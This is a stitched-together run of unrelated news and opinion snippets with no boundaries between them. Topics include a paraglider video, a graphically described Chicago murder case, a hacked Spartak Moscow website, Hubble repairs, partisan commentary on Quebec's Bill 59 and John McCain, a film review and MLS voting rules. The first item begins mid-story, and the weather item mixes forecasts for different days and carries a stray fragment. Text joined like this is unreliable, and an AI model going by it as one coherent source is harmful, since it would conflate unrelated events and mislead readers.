Schanze was arrested in 2011 after posting a video on YouTube that showed him paragliding from a historic monument in Oregon.
FOX 13 visited his business in a Sandy industrial center. He didn't answer the door but said over the phone, “What in the world are you talking about? Don't try and blame anything on me, or I'll sue you."
Whoever is actually in the video is not alone. There's a co-pilot who asks the pilot if he kicked an owl twice.
Since the video went viral, the phones have been ringing at Utah's Division of Wildlife Resources.
“The law enforcement guys who looked at the video feel it does appear some wildlife laws have been violated, and it's been sent to the appropriate agency to be further investigated and that's the US Fish and Wildlife Service so that's where the case is right now,” said DWR spokesperson Mark Hadley.
Since owls are migratory birds, they're protected under federal law. Now,the U.S. Fish and Wildlife Service will determine if the video warrants prosecution.
FOX 13 compared the glider in the video to others Schanze has posted on YouTube and they seem to be the same.
The Humane Society wants action. Officials think the pilot should be charged and potentially fined. The U.S. Powered Paragliding Association agrees and hope the pilot never flies again. The USPPA and other paragliders are concerned that this pilot's actions may tarnish the sport and potentially shut down launch sites.
CHICAGO -- The fatal stabbing of a hairstylist in Chicago was part of a sexual fantasy hatched in an online chatroom between a Northwestern University professor and an Oxford University employee, whose plan included killing someone and then themselves, prosecutors told a Cook County judge Sunday at a bond hearing for the men.
An Illinois prosecutor shared disturbing new details about the July 27 slaying, describing to the court how Trenton James Cornell-Duranleau, the 26-year-old boyfriend of since-fired microbiology professor Wyndham Lathem, was stabbed 70 times at Lathem's Chicago condo and with such brutality that he was nearly decapitated. His throat was slit and pulmonary artery torn.
Lathem, 46, had communicated for months before with Andrew Warren, 56, about "carrying out their sexual fantasies of killing others and then themselves," Natosha Toller, an assistant Cook County state's Attorney, told the court. While the prosecutor used the plural in talking about the alleged fantasy to kill, she did not say there were other victims.
Northwestern professor, Oxford employee arrested in Chicago stabbing
Judge Adam Bourgeois Jr. at one point shook his head in apparent disgust as he listened to the prosecutor offer a chilling narrative of the slaying. He later deemed both men potentially dangerous and flight risks, ordering them to remain in jail pending trial on first-degree murder charges.
"The heinous facts speak for themselves," he said.
Lathem and Warren -- a British citizen employed as a financial official at the Oxford, England, university -- were dressed in their own clothes Sunday at their first court appearance in Chicago. They stood calmly, their hands behind their backs, as the prosecutor and judge spoke.
Lathem paid for Warren's ticket to travel to the United States and he picked Warren up at Chicago's O'Hare International Airport a few days before the killing, the prosecutor said. On July 26, one day before the killing, Lathem booked a room for Warren near the condo, Toller said.
Cornell-Duranleau, a Michigan native, had been asleep in Lathem's high-rise Chicago condo when Lathem let Warren into the 10th-floor unit around 4:30 a.m. on July 27 -- treading carefully so as not to wake the victim. As Warren stood in a doorway, Lathem crept up to Cornell-Duranleau and began plunging a 6-inch drywall saw knife into his chest and neck, Toller said.
Lathem had told Warren to take video of the killing using his cellphone, but Warren did not end up recording it, the prosecutor said.
When Cornell-Duranleau awoke, he began screaming and fought back; Lathem yelled at Warren, asking him to help subdue Cornell-Duranleau, the prosecutor said.
Warren ran over to cover the victim's mouth, then struck him in the head with a heavy lamp in an attempt to silence him, Toller said. As Lathem continued to stab the victim, Warren left the room and returned with two kitchen knives, she said.
Warren bent over Cornell-Duranleau and joined Lathem in stabbing him, the prosecutor said. At one point, the victim bit Warren's hand as he struggled to fight off the attack.
She said the victim's last words were to Lathem: "Wyndham, what are you doing?"
While prosecutors said Lathem and Warren had concocted a plan to kill themselves after the stabbing, Toller did not say why they never followed through with it.
After showering, Lathem and Warren left the apartment an hour after the stabbing began, the prosecutor said. They surrendered to California authorities on Aug. 4 after an eight-day manhunt and were recently returned to Illinois.
The stab wounds to Cornell-Duranleau included 21 to the chest and abdomen, and 26 in the back, as well as multiple cuts on his hands. Cornell-Duranleau's lungs were also both punctured, and there were wounds to his colon, spleen and liver.
After leaving the apartment and renting a car, Lathem on the same day left an anonymous $5,610 donation -- in cash -- at the Howard Brown Health Center in Chicago in the name 'Cornell-Duranleau.' They then drove to Lake Geneva, Wisconsin, and, 13 hours after the first payment, Lathem went to its public library and wrote a $1,000 check as a donation, also in the victim's name, the prosecutor said.
Toller said Lathem, while on the run, sent a video message to his parents and friends, admitting to the killing and telling them "he is not the person people thought he was."
Lathem's lawyer, Barry Sheppard, said in a brief statement to reporters after the hearing that people shouldn't "engage in a rush to judgment." He said his client had led "a life of unblemished ... citizenship," which included academic work on the bubonic-plague virus.
Warren spoke briefly when the judge asked if he wanted a British diplomatic office to be in contact. "No," Warren said. For the bond hearing, Warren relied on a public defender, who did not comment later.
The judge set a Tuesday hearing for the men, when another judge will be assigned to oversee the criminal case. Both would have a chance to enter pleas at a later arraignment.
Anzac Day 2015: Vandals target Australian war cemetery in English village of Harefield
Updated
The main Australian war cemetery in the UK has been targeted by vandals who sawed through a flagpole and spray-painted a memorial on the eve of Anzac Day.
The attack took place at St Mary's churchyard in Harefield in Middlesex, outside London.
More than 100 Anzacs and one Australian nurse, treated at the nearby Harefield Hospital during WWI, are buried on the site.
The Commonwealth War Graves Commission (CWGC), which looks after the graveyard, said today's Anzac Day service would still go ahead, after repairs had taken place.
"Disgusting, absolutely disgusting, for what these lads gave up for us - to be treated like that is just shocking," the commission's Barry Rushton said.
The graves at Harefield have a unique scroll design which was chosen by Anzac patients brought to Harefield - then known as Australian Auxiliary Hospital No. 1 - for treatment from Europe and the Middle East.
Earlier this year the CWGC restored the graves of the Australian servicemen buried at Harefield.
"Ahead of the ceremony, we will either make a clean cut through the pole and have it erected at a lower height, or we will support the pole with brackets," a CWGC spokesman said.
"It will be safe and usable for the ceremony.
"The vandalism is very upsetting for the Commission after all the work that has taken place over the last three months."
Harefield's annual Anzac Day service, which features local school children laying flowers on every grave, started in 1921.
A new visitor information panel featuring smartphone technology revealing the personal stories of some of those buried on the site was also targeted by the vandals.
The CWGC said it was not yet known if the panel unveiling will go ahead.
Topics: world-war-1, anzac-day, crime, united-kingdom
First posted
Tactical Firearms is appealing to the public for help fighting what it claims is a politically motivated problem with its bank.
The Katy, Texas, gun store has made a national name for itself by posting snarky political signs – mostly opposing liberal gun-grabbers and Obama – on its outdoor marquee.
BizPac Review has reported on several of the good-humored signs in the past, but it seems there's not a lot to laugh about these days, according to the company's web site and newsletter. The lengthy plea claims that the bank has called in on a loan that could put the store out of business. Here is some of the explanation from the site:
Tactical Firearms has prided itself in being honest with our customers from our first day in business. That's why we are alerting you today to a situation that we believe to be unjust and punitive against Tactical Firearms, and this is a situation that threatens to put us out of business on July 1, 2014. Tactical Firearms has just been given notice that our loan with Icon bank has been called in. Not because of no payment, as we have never been late or missed a payment, but because the board of directors has chosen to not renew the loan. Deciding to call a loan which has a perfect payment record and is profitable to the bank is almost unheard of in the banking industry. This is why we believe Tactical Firearms is being specifically targeted with punitive actions in an effort to put us out of business. . . . At the same time, the bank's excuse to us for calling in the loan is because the “government does not support loans to the gun, alcohol, or hotel industries” and the banks get heavily audited. This is an extension of the Obama administration's backdoor efforts to bankrupt the firearms industry and all its supporting retailers and firing ranges. Since the government can't take away our Second Amendment directly, they make it difficult for businesses to stay open by pressuring banks to close loans. This has already happened to other gun shops around the country. We are fighting to make sure it doesn't happen to us.
You can read all of the plea here.
You can hear the owner on a recent radio show via YouTube:
Tactical Firearms store targets Obama again
Ouch! Texas gun shop marquee hits Obama where it hurts
Texas gun store posts another zinger sure to offend politicians
John Goodman's first visit to the Howard Stern Show on Dec. 9, 2013 Photo: The Howard Stern Show
Legendary actor John Goodman returns Monday to the Howard Stern Show, ahead of his new film "10 Cloverfield Lane." Described by producer J.J. Abrams as a "spiritual successor" to his 2008 found footage film about a Godzilla-like monster terrorizing Manhattan, not much is really known about the upcoming flick, which stars Goodman and Mary Elizabeth Winstead, except that the trailer is nuts.
While his new movie is shrouded in mystery, John's history with the Stern Show is not. Though the "Roseanne" star has been a Stern Show superfan for years, he didn't appear as a guest on the show until 2013.
Here's a quick recap of that wonderful, wide-ranging conversation with Howard:
SATURDAY NIGHT SPECIAL
John Goodman plays Linda Tripp on "Saturday Night Live" Photo: NBC
John had several projects going on when he first visited the show in December of 2013: Namely the Coen brothers drama "Inside Llewyn Davis" and a hosting gig on that weekend's "Saturday Night Live." It would mark John's 13th time hosting NBC's sketch comedy show -- an impressive feat only two other people have topped (Alec Baldwin, 16, and Steve Martin, 15).
Needless to say, John shared several great stories with Howard about his many years of involvement with "SNL." Some stemmed from his days before his first guest hosting gig, too, like when John told Howard that he had auditioned to be a regular player back when Lorne Michaels was on the sidelines and Jean Doumanian was the sketch show's executive producer. John didn't get the gig, though he admitted to hanging out around 30 Rock afterword "like a stalker." Eventually, however, his ABC sitcom "Roseanne" took off and he was finally invited on as a host.
John also revealed that he still got nervous, even after hosting the show over a dozen times. He joked to Howard that he hoped an act of God might get him out of hosting that weekend's show: "I'm praying for one of those rare New York earthquakes."
There was no earthquake, of course. John went on to host "SNL" that weekend and he absolutely crushed it.
ROSEANNE ROMANCE?
"Roseanne" Photo: ABC
Speaking of "Roseanne," Roseanne Barr had recently admitted to being in love with John while they worked together on the show, so Howard asked John about all of that. John told him that he loved Roseanne, too, but that his love for her was platonic.
John said he was living out of a suitcase before reading for the part of Dan Conner and he told Howard that he and Roseanne had chemistry right away. He admitted things got weird when Roseanne's husband Tom Arnold began showing up on set, however.
"This guy shows up sweating and ordering people around," John told Howard, though he went on to say that he and Tom have since become friends.
John also revealed to Howard that Comedy Central had asked him to participate in Roseanne's 2012 roast, but that he had declined because roasts make him uncomfortable.
THE SECRET SUPERFAN
John Goodman and Richard Christy Photo: The Howard Stern Show
2013 marked John's first visit to the show, but during the interview he revealed he had actually been a Howard superfan for years.
He dropped in several Stern Show references during his visit, from "Hey Richard, this is your dad,'" to "Oh-phelia." He also expressed disappointment over the time that Stuttering John called him a dick.
Additionally, he promised to have a chat offline with with Richard, who had expressed interest in seeing "Inside Llewyn Davis" at a theater serving booze. It was then John admitted that, while he did have an affinity for the hooch, he had never gone so far as to drink pumpkin beer through his ass.
John did Richard a solid, however, by reciting one of his iconic "Big Lebowski" lines just for him. "Larry," John said, in character as Walter Sobchak, "this is what happens when you fuck a stranger in the ass."
Yes, it was a Stern Show interview for the ages, which is why we're excited for John to return again on Monday.
In the meanwhile, check out the tense trailer for "10 Cloverfield Lane":
Anders Borg, the former Swedish finance minister and current chairman of the World Economic Forum's Global Financial System Initiative, has stepped down from a second top job after he was forced to apologize for what Bloomberg dubbed "unpleasant" behavior at a party in the Stockholm archipelago. Borg, 49, informed Citi that he will resign from his role as senior adviser, according to an emailed statement from the bank, Bloomberg reported. The resignation follows Borg's Saturday resignation as deputy chairman of investment corporation Kinnevik with immediate effect.
Sweden's former FinMin, Anders Borg, with his fiancee Dominika Peczynski
Borg, who lost the 2014 election after navigating Sweden's finances for eight years and was widely hailed as the man responsible for his country emerging from the 2008 global recession virtually unscathed, issued a public apology this past Friday after a shocking report in Sweden's Aftonbladet.
What happened? As the Swedish newspaper reported on Friday, during a private party on Husaro, an island in the Stockholm archipelago last Friday, at approximately 11.00 PM, the "noticeably intoxicated" former finance minister decided to expose his penis and grope other men, trying to compare penis sizes. Sources said that he also called female guests "sluts" and "whores."
Swedish media reported that some 60 people were in attendance, including several members of the Swedish political and financial elite and a number of families with children. One reported victim of Borg's breakdown was the CEO of "a leading Swedish weapons manufacturer."
"I don't know what he drank, but it was a lot" an anonymous partygoer told Aftonbladet.
Another guest told the newspaper that "He was very drunk and very pissed off. He acted incredibly inappropriately. It was very uncomfortable to watch."
When asked to sleep in another house, Borg became aggressive and threatened the host of the party as well as a woman who tried to calm him down.
On Friday morning, Borg wrote about the party in a Facebook post, in which he tried to apologize to everyone involved.
”I was at a party last weekend and had a blackout. I don't drink more than most people but I have been under a lot of pressure lately", he wrote adding that "I've heard that I behaved very inappropriately. I want to sincerely apologize to the other guests. I feel a lot of disappointment and regret my behavior."
Borg has received dozens of supportive comments on his Facebook post, including from his former pop star and model fiancée, Dominika Peczynski.
Peczynski, a member of 90s band Army of Lovers who once posed for Playboy Scandinavia, is now a PR executive who started dating Borg after his divorce from the mother of his three children in 2015. She wrote, 'I love you Anders, I know it wasn't the real you that was on show'.
Then, after being reported to the police, Borg said in a follow-up Facebook post on August 5 that he couldn't comment on the situation further.
“My apology on Facebook was because I had behaved unpleasantly,” he said. “It should not be interpreted as an acknowledgment of crime. I have not done anything wrong.” In an e-mail to Dagens Industri, Borg announces that he's gonna seek help after the incident.
Police are conducting with a preliminary investigation triggered by a complaint based on the media reports, Swedish radio Ekot reported on Monday.
According to Bloomberg, the spokeswoman for the WEF, where Borg serves as a Chairman, said in an email that the group is “following the developments closely” but doesn't comment on ongoing investigations.
All things considered, Borg's experience could make for a very informative - not to mention extremely popular - panel discussion at the next annual WEF boondoggle in Davos: "how elites behave in public when drunk."
While the rest of Canada is being force-fed the Duffy Senate “scandal”, in Quebec a proposed law that will label any criticism of Islam or Islamism as “hate speech” is being quietly pushed through the National Assembly.
Bill 59 will permit Muslims to make complaints to the Quebec Human Rights Commission (QHRC) against anyone critiquing Islam or Islamism, triggering lawsuits for hate speech.
As if that wasn't enough of an attempt to silence Muslims like me, who have struggled all of our adult lives to expose the perils of Islamism, Article 6 of Bill 59 would, “give the QHRC the power to initiate legal proceedings before the Quebec Human Rights Tribunal without having to wait for complaints from the public.”
While this serious encroachment on freedom of expression and speech is being pushed through the legislative process in Quebec, none of the leaders of Canada's political parties have uttered a word on the issue.
Not Liberal Leader Justin Trudeau, who still has not disclosed what he discussed in his recent closed-door meeting with Islamic leaders in Regina,.
Not NDP Leader Thomas Mulcair, whose party has a strong base in Quebec and who has acted as if the implications of Bill 59 are of no concern to him.
Even Prime Minister Stephen Harper, who has identified Islamism as a threat to Canada, has so far kept mum on the proposed law.
Muslims in Quebec are divided on its merits, with some in favour and some against.
But ironically, some Islamist-promoting organizations and mosques have welcomed Bill 59, notwithstanding the fact they violate it every week when they start their Friday prayers with a ritual invocation that asks, “Allah to give Muslims victory over the ‘kufaar' (Christians, Jews and Hindus).”
The hypocrisy of Islamists invoking victimhood when it comes to hate speech is laughable.
Multiple times every day, Islamists have no problem depicting Jews as “those who have earned Allah's anger”, and Christians as “those who have gone astray” in their prayers, both at home and in the mosque.
Then they cry foul when their man-made sharia laws written in the eighth and ninth centuries are critiqued, sometimes by their fellow Muslims.
Here is how the online Islamic site “SunnahOnLine” explains the opening verse of the Qur'an that is part of the mandatory Islamic prayers in mosques across Quebec and Canada, and which define the characteristics of Christians and Jews as essentially untrustworthy.
Sunnah OnLine (The practice of the Prophet) quotes the 14th century Islamic scholar At-Tirmidhi explaining the opening verse of the Qur'an this way:
“The Jews and the Christians even though both of them are misguided and both of them have Allah's Anger on them — the Anger is specified to the Jews, even though the Christians share this with them, because the Jews knew the truth and rejected it and deliberately came with falsehood …”
It seems the Islamists want to have their halal cake and eat it too.
The trouble for them is that Canada still has Muslims who have the courage to expose their double standards.
Let me assure them, we will do everything we can to make sure Quebec's Bill 59 does not pass.
But if it does become law, the first complaint to the QHRC will be against Islamist mosques for spreading hatred against Jews and Christians.
That is a promise.
High above Earth, where the space shuttle Atlantis has lassoed the Hubble Space Telescope, some of the simple repairs have been heart-poundingly difficult, and many of the most daunting tasks have turned out to be a breeze.
So it went yesterday, with two astronauts ripping open an instrument and fiddling with sharp objects that posed a potentially lethal hazard to pressure-suited spacewalkers. Heralded as the most challenging spacewalk of the mission, it went like a dream -- and for at least one day, the aging Hubble and its eccentricities didn't give the astronauts fits.
John Grunsfeld, an astronaut-astronomer who has observed the universe via the Hubble and is also its most experienced repairman, joined crewmate Andrew Feustel in a six-hour, 36-minute repair job unlike anything attempted in orbit. The standard procedure for the Hubble is to swap old instruments for new ones in the most modular fashion possible, keeping it as simple as trading ink cartridges in a printer.
But yesterday what unfolded was a gearhead's fantasy, with Grunsfeld and Feustel, operating in the payload bay garage, pulling out all manner of customized tools and contraptions to bust open and fix the shorted-out Advanced Camera for Surveys.
To get inside the enormous camera, Grunsfeld first had to attach a plate that, when tightened, cut away a grid that covered an underlying panel. Then, with that panel exposed, he used a hand-held pistol-grip power tool to unscrew 32 fasteners, each of which had to be captured in a tiny plexiglass compartment to prevent it from becoming a hazard.
Grunsfeld's task was made all the more difficult by the awkward position of the instrument. He was unable to face the screws head-on, and had to approach from a 45-degree angle. A strut partially blocked his vision. A fear among engineers was that he would have a hard time visually confirming that each fastener had been loosened. As Grunsfeld worked, he called out how many turns each fastener required to become free.
"Click. Eight turns on number two, click about seven. . . . Eight and a half on number three . . . Eight and a quarter on number four . . ."
Successful, Grunsfeld then used a different tool to squeeze and then yank out four dead electronic circuit cards. Each card presented sharp edges that might nick a pressurized glove and expose the astronaut to the vacuum of space.
The white-knuckle moment went quickly and with only one hitch. For several minutes, the fourth and last card became stuck in place. Grunsfeld, panting a bit at times but always calm, declared simply, "I think we'll get it." He retrieved a tool resembling needle-nose pliers and, with much shaking and wiggling and prying, freed the card and delicately stowed it in a bag.
The astronauts also removed a refrigerator-sized, mirror-packed instrument called COSTAR, which was installed in 1993 to correct Hubble's blurry vision. It is no longer needed, because new instruments have the same corrections built in. The astronauts used the vacant slot to install a new instrument called the Cosmic Origins Spectrograph, which will probe the deep structure of the universe and search for filaments of dark matter that may bind together the galaxies in a kind of invisible cosmic foam.
The mission has been a triumph for NASA, but it has also been a bumpy ride for the astronauts and their support team on the ground. The Hubble has been idiosyncratic. In space, the telescope isn't the same creature as the mock-up in the deep pool at the Johnson Space Center, where the astronauts had simulated their spacewalks.
"After seven years without having people around, Hubble has lost its accommodation to people. It's gone wild again," said David Leckrone, the Hubble senior project scientist, after the second, rather harrowing spacewalk on Friday.
The National Weather Service predicts 8 to 15 inches of snow for Norfolk, Plymouth and Bristol counties on Monday, with a foot the most likely accumulation. Snow will begin falling around midnight Sunday.
SEVERE WEATHER LINKS
WCVB-TVs the latest forecast National Weather Service
Winter weather page Storm damage reports Watches and warnings Massachusetts radar loop Power failures
National Grid NStar More
AP Interactive Blue Hill Observatory Mass. Emergency Management Cellphone readiness Red Cross safety tips Flood safety tips Normal 0 Precipitation will over spread the region very early Saturday Morning. Initially it will mainly be snow. The snow will change to rain and sleet south of the Massachusetts Turnpike for a time later in the morning and afternoon before changing back to snow and ending early Saturday evening. Snow accumulations will be between 2 and 5 inches along the Boston to Providence corridor. with more north and west and less south and east. A subtle change in the track may result in more or less snow than currently forecast. A winter weather advisory will likely be needed for at least some of this region. Pockets of minor coastal flooding are likely during the Saturday afternoon high tide cycle along the eastern Massachusetts coast.. Northwest wind gusts of 40 to 50 mph are expected Saturday night across the Cape and islands.
Spartak Moscow website hacked by Turkish nationalist group
ISTANBUL - Hürriyet Daily News
AA Photo
Nationalist Turks hacked the website of Spartak Moscow last night to demand that team officials apologize after a group of fans from the Russian side burned Turkish flags and Atatürk posters during an Aug. 21 Champions League playoff against Fenerbahçe.The group replaced the website's original content with a statement that called on the team to "immediately apologize.""You will immediately apologize to the Turkish Republic and the Turkish people. No crime goes without punishment, and FIFA may forgive you, but we won't," the statement read.A portrait of Atatürk next to a Turkish flag was also posted on the website.Spartak Moscow fans burned flags and posters of modern Turkey's founding father, Mustafa Kemal Atatürk, during their team's 2-1 victory over the Istanbul giants in the first leg of their Champions League playoff.An official response is yet to come from UEFA, but Russian media reports hinted at a possible end to Spartak's Champions League journey if football authorities decide to come down hard on the club.
Tuesday at a joint news conference with Greek Prime Minister Alexis Tsipras, President Barack Obama said the “rhetoric among Republican elected officials and activists and media,” during the presidential campaign was “pretty troubling and not necessarily connected to facts.”
Obama said, “When you see a Donald Trump and a Bernie Sanders, very unconventional candidates have considerable success, then obviously there's something there that's being tapped into. A suspicion of globalization, a desire to rein in its accesses, a suspicion of elites and governing institutions that people may not feel are responsive to their immediate needs, and that sometimes gets wrapped up in issues of ethnic identity or religious identity or cultural identity and that can be a volatile mix. It's important to recognize though that those trends have always been there and it's the job, I think, of leaders to try to address people's real legitimate concerns and channel them in the most constructive ways possible.”
“Did I recognize that there was anger or frustration in the American population?” he continued. “Of course, I did. first of all, we had to fight back from the worst recession since the the great depression and I can guarantee you if your housing values have crashed and you've lost most of your pension and your job, you're going to be pretty angry, and so we fought back and recovered. But that left, I think, fear and anxiety in a lot of people, a sense that the economy wasn't as certain as it could be and maybe the game was rigged on Wall Street or by special interests in Washington or what have you and that's been there.”
He added, “I was also aware of it because of the fact that you've seen some of the rhetoric among Republican elected officials and activists and media. some of it pretty troubling and not necessarily connected to facts, but being used effectively to mobilize people. And obviously, President-elect Trump tapped into that particular strain within the Republican party and broaden that enough and get enough votes to win the election.”
Follow Pam Key on Twitter @pamkeyNEN
Websites won't risk a fine by failing to meet new cookie rules, the Information Commissioner's Office has said.
The rules - the result of an EU Directive - technically came into force last May, but the ICO gave UK sites a year before taking enforcement action.
That grace period ends next week, but the ICO has assured website owners it won't be issuing any fines. "Please don't read that as suddenly the ICO is going to launch a torrent of enforcement action," said deputy commissioner Dave Smith, at a media briefing.
Sites will generally only be investigated by the ICO after users report them via a yet-to-launch tool on the watchdog's site. Only the most intrusive cookies will lead to the ICO using its "enforcement powers", Smith said, which includes fines up to $500,000 or notices requiring companies to take action to fix data protection flaws.
Smith said fines were unlikely for cookies, as they wouldn't meet the requirements for being "substantially distressing" to individuals. "We do not rule that out but it's most unlikely that breaches of cookie requirements meet the requirement for monetary penalty," he said. "In the area of cookies, it's quite hard to satisfy the test for a fine."
A briefing document from the ICO put it more clearly: "In reality the placement of a cookie on an individual's device will not meet the necessary criteria to be considered for a CMP [civil monetary penalty]."
The watchdog stressed that sites that have taken some steps to reach compliance were unlikely to face any action. "We recognise that some people have web development cycles that don't just start when the ICO says," added Dave Evans, strategic liaison manager at the ICO.
Leading by example
Smith said people have asked if the ICO's own site should be looked to as a model for how to address the new rules. "We don't put it up as a wonderful inventive solution... but above all, it's legally compliant," he said, adding there are "probably much better ways of getting consent".
However, the ICO had few examples to point to for businesses to get ideas, saying it didn't want to hold up specific sites as models of compliance as every site will require a different approach and use different technologies - adding apps could also be covered by the regulations.
Smith said the ICO was about to send letters to 50 top websites, asking what they're doing to meet the rules. Earlier this week, the Cabinet Office admitted the majority of Government sites wouldn't reach full compliance by next week. The ICO said that didn't give a free pass to other sites. "Don't take Government websites as an excuse," Evans said.
A Canadian man was arrested for speeding down a local street while using a headlamp in place of his nonfunctioning headlights. The man was charged with speeding and operating an unsafe vehicle and his car was towed, as it was deemed unsafe for travel according to police. Photo by UPI/Shutterstock/Alex Schmidt
GUELPH , Ontario, July 13 (UPI) -- Canadian police arrested a speeding driver who was seen wearing a headlamp in place of his car's broken headlights.
A Guelph police officer first noticed what appeared to be a bicycle light approaching him while conducting speed enforcement before discovering the light was coming from a car with no working exterior lights.
According to the CBC, police said the officer "found the driver to be wearing an LED headlamp on his forehead. It was that single battery operated headlamp shining through the front windshield that was first observed by the officer."
The officer also tracked the 35-year-old man traveling 108 kilometers per hour (67 mph) in a 70 kilometers per hour (43 mph) zone on Monday night at 10 p.m. along the street which officer's say has no artificial lighting and is completely dark without traffic.
Police said the man was charged with speeding and operating an unsafe vehicle and his car was towed, as it was deemed unsafe for travel.
Movie Review Split B+ Movie Review Split B+ B+ Split Director M. Night Shyamalan Runtime 117 minutes Rating PG-13 Cast James McAvoy, Anya Taylor-Joy, Betty Buckley, Haley Lu Richardson, Jessica Sula, Brad William Henke Availability Theaters everywhere January 20
At last, M. Night Shyamalan has decided to let his freak flag fly, and made the sort of unapologetic B-movie one always suspected he had pent up inside of him; it swerves from dark comedy to 1970s-esque psycho-horror as the irresistibly preposterous script struggles for attention against a delirious lead performance by James McAvoy. Split is funnier, campier, and more freewheeling than anything its writer-director has done—slightly overlong, but reminiscent of Brian De Palma films like The Fury and Femme Fatale in its refusal to be boring. Shyamalan pulls out one ingenious camera move after another with the help of Michael Gioulakis, the cinematographer of It Follows, echoing Split's subterranean setting and subconscious concerns through creative and formalist thrills. Self-reflexive, maybe even therapeutic, it twists the themes of fate and trauma that have been his stock-in-trade since The Sixth Sense into a very entertaining genre exercise—some of his strongest work since the days of The Village and Signs.
Advertisement
In the bravura opening sequence, three teenagers Casey (The Witch's Anya Taylor-Joy), Claire (Haley Lu Richardson), and Marcia (Jessica Sula) are kidnapped from a mall parking lot and locked inside a bunker-like basement by Kevin (McAvoy)—a man with an incredibly elaborate case of dissociative identity disorder—or more specifically, by two of his normally harmless alternate personas, who have staged an internal revolt to prepare for the arrival of an apocalyptic entity that they have dubbed “The Beast.” Key to the gonzo conception of Split is the way it reformulates some of its director's best-known work; Kevin is basically the plot of The Village—that is, a community of survivors in conflict over an unseen monster—mashed together with a second film that will go unnamed here in the interest of avoiding spoilers. (There's a twist ending, too, but although it's a hoot, it's extraneous to the plot.) Four personas figure prominently in Split: self-loathing neat freak Dennis, overbearing Patricia, childlike Hedwig, and easygoing Barry.
In a go-for-broke piece of acting, McAvoy plays them all as distinct characters and as different parts of the almost completely unseen Kevin, their place in his psyche revealed through exaggerated mannerisms. Casey, the de facto leader of the three abductees, has to resort to deceiving the personas or playing them against one another to get out; if that weren't enough of a logic puzzle, the personas can also manipulate and impersonate each other, though pointedly, they can't mimic Kevin. Toying with audience perception is Shyamalan's signature trick, but here he outdoes himself, creating a cat's cradle of limited perspectives, point-of-view and overhead shots, and rapid changes in visual focus. As strange as it may sound, Split actually has more to say about the intersection of emotional, sexual, and artistic repression than one could hope to unpack in a review; it is both unabashedly trashy and a lot smarter than it lets on, with a sense of humor to match.
Above all, it's fun. It's a credit to Shyamalan's considerable gifts as a stylist of pure suspense that the film moves fluidly so much of the time, despite periodic cuts to the requisite concerned psychologist (Betty Buckley) and some largely unnecessary flashbacks to Casey's childhood. Nestled among those, however, is one of the more disturbing scenes in Shyamalan's oeuvre. For as devil-may-care as Split might be when it comes to form, it is a dark and seemingly personal film deep down. The found-footage horror flick The Visit—a film that's only a little less self-reflexive than Split—gave the one-time Hollywood golden boy a chance to start over after a couple of misguided forays into the world of effects-driven fantasy blockbusters. This film, made on an identically low budget but with a lot more confidence, feels like another step in a transformation: It waves away the somber atmosphere of his early successes to run hollering down a dark tunnel, chasing familiar motifs further underground.
Advertisement
For thoughts on, and a place to discuss, plot details we can't reveal in this review, visit Split's Spoiler Space.
NEW YORK – If the MLS All-Stars are going to beat English Premier League champions Manchester United in the All-Star Game on July 27 at Red Bull Arena, they're going to need a big game from Hans Backe.
The New York Red Bulls manager was named by MLS as the All-Stars head coach to match wits against Sir Alex Ferguson in the nationally televised affair (8:30 p.m. ET, ESPN2 and Galavisión), which is a rematch of the 2010 match that Man Utd won 5-2 at Reliant Stadium.
READ: Backe's impressive history vs. Man United
In previous All-Star Games, the head coach of the league's best team was given the honor of leading MLS' best. This year, however, MLS opted for the home team manager for “competitive considerations.” While taking over the All-Star team, the 59-year-old Backe would not miss any practices with the Red Bulls.
In another new twist for the 2011 edition of the All-Star Game, the Swedish manager will also have the opportunity to choose the starting lineup. Fans will still be able to vote for their own top 11 All-Stars, but Backe will have the final say on who takes the field against Manchester United.
There will be 32 All-Stars named with fans voting from a field of 108 players determined by a select media panel. Fan voting via text, twitter and online will conclude on July 5 and the fan selections will be announced on July 10. Then it will be up to Backe to choose whether any of those 11 fan selections make the gameday roster. Backe will announce his squad on Monday, July 18.
The 32 players named 2011 AT&T MLS All-Stars will be selected in four phases:
1) Ballot creation: A select media panel will determine the field of players – six players per team – who are most deserving of consideration for this year's All-Star Game. Those 108 players will be eligible for fan voting.
The ballot of eligible players nominated by the media panel will be announced on MLSsoccer.com on June 8.
2) Fan voting: Beginning June 8 and ending July 5, fans will select the “First XI” All-Stars. Fans can vote via three digital platforms:
At MLSsoccer.com: Vote for your starting lineup of 11 players, beginning June 8.
Via mobile texting (SMS): Vote for one player per text message with specific instructions to be announced June 8. Each vote will count equally with those submitted online in determining the First XI, but the player who receives the most text votes will be guaranteed one of those 11 slots.
Twitter: Specific instructions for voting via Twitter will be announced June 8.
The First XI will be announced Sunday, July 10, likely on ESPN during halftime of the Portland-Seattle game that begins at 4 p.m. ET.
3) Coach & Commissioner selections: The MLS All-Star head coach will select the gameday roster. Players named to the First XI are eligible for selection to the gameday roster by the coach. MLS Commissioner Don Garber will select two All-Stars; the coach will decide if those two are selected for the gameday roster.
The coach and Commissioner selections will be announced on Monday, July 18.
4) Player selections: Once the final gameday roster has been announced, voting by MLS players will determine the remainder of the 32 All-Stars named annually per the CBA (known as the “inactive roster”).
The final list of 32 All-Stars (4 goalkeepers, 8 defenders, 13 midfielders and 7 forwards) will be announced on MLSsoccer.com on July 25.
John McCain does not have the ability to fix this economic crisis. After declaring the fundamentals of the economy strong, he created a political circus in Washington last week by mucking up bailout negotiations; a deplorable stunt, considering he and his political cronies helped cause the current meltdown.
It was McCain and his economic adviser Phil Gramm who pushed for the deregulation that helped lead to the banking crisis, and it was McCain's crony Rick Davis who had deep lobbyist ties to Freddie Mac. Don't let others be fooled by McCain's economic grandstanding because the reality is his policies and principles will only exacerbate our financial hardships. That's why you must spread this video.
McCain is being deceitful with his sudden populist message and support for regulation; his economic policies still favor our nation's wealthy elite. Call out McCain's economic dishonesty. Send this video to friends and ask them to sign up for a free Brave New Films video subscription to know the latest on TheRealMcCain.com. Then, post it on your blogs and spread it on networking sites like Digg and Reddit. These are some of the best ways to reach people who are not following this debate closely.
“Never turn your back on family, even when they hurt you. Never let life get the better of you. And if you remember nothing else, remember to find time to eat together as a family. Even when times are rough; especially when times are rough. There's no lack of painful things in this world, but hunger and loneliness must surely be two of the worst. Thanks to you, my precious family, I didn't know a moment of either of those the last ninety years.”
– Sakae Jinnouchi, Summer Wars
KOI KOI!! So glad everyone is loving on #SummerWars!
– Brina Palencia, the voice of Natsuki.
